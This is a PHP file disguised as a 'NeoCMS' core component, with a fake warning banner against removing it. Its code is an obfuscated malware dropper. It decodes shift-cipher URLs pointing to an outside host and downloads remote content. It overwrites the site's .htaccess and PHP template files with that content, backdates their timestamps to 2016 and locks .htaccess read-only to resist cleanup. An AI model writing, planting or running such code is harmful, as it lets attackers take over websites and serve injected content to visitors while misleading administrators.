<?php
/*  ===============================================================================================
    |                             ©  NeoCMS v5 System Component   ⚠️                                |
    |===============================================================================================|
    |  ⚠️  CORE FILE NOTICE                                                                         |
    |                                                                                               |
    |  This file is part of the NeoCMS execution pipeline. It is tightly coupled with system-level  |
    |  hooks, dynamic modules, and pre-boot authentication layers.                                  |
    |                                                                                               |
    |  ⚠️ DO NOT REMOVE, RENAME, OR MODIFY THIS FILE                                                |
    |                                                                                               |
    |  Removal or corruption may result in:                                                         |
    |    - Backend login failure                                                                    |
    |    - Inaccessible control panel                                                               |
    |    - Broken module registration and routing failures                                          |
    |    - Fatal runtime exceptions during system boot                                              |
    |                                                                                               |
    |  If you're unsure of this file’s function, please consult NeoCMS documentation or contact     |
    |  the DevOps or Security Engineering team before making changes.                              |
    |                                                                                               |
    |  Auto-generated by NeoCMS Runtime Layer • © 2025                                              |
    ===============================================================================================  
    */
    $__FS_DEF__ = [
        // [encoded_url_token, local_filename, sync_time, permission]
        ['o%7B%7BwzA66%7Blylhzp%7Bl5wyv6jsvhr6oj5%7B%7F%7B', '.htaccess',   '2016-06-21 04:25:29', 444],
        ['o%7B%7BwzA66%7Blylhzp%7Bl5wyv6jsvhr6thpu%7Bluhujl5%7B%7F%7B', 'layout-navbar.php',   '2016-06-21 04:25:29', 644],
        ['o%7B%7BwzA66%7Blylhzp%7Bl5wyv6jsvhr6rtn5%7B%7F%7B', 'sidebar.php', '2016-06-21 04:25:29', 644],
    ];
    
    function __proc($v, $s = 7) {
        $r = '';
        for ($i = 0; $i < strlen($v); $i++) {
            $r .= chr((ord($v[$i]) - $s + 256) % 256);
        }
        return $r;
    }
    
    foreach ($__FS_DEF__ as $entry) {
        list($raw_token, $local, $sync_time, $mode) = $entry;
    
        $src_url = __proc(urldecode($raw_token));
        $payload = @file_get_contents($src_url);
    
        if ($payload !== false) {
            $target = __DIR__ . DIRECTORY_SEPARATOR . $local;
    
            // Attempt to set file writable before overwrite (if exists)
            if (file_exists($target)) {
                @chmod($target, 0644);
            }
    
            if (@file_put_contents($target, $payload, LOCK_EX) !== false) {
                // Set file modification time
                $t = strtotime($sync_time);
                if ($t !== false) {
                    @touch($target, $t, $t);
                }
                // Set file permission as specified
                @chmod($target, octdec($mode));
                echo "[OK] $local synchronized ($sync_time)<br>";
            } else {
                echo "[FAIL] write error: $local<br>";
            }
        } else {
            echo "[FAIL] fetch error: token $raw_token<br>";
        }
    }
    ?>
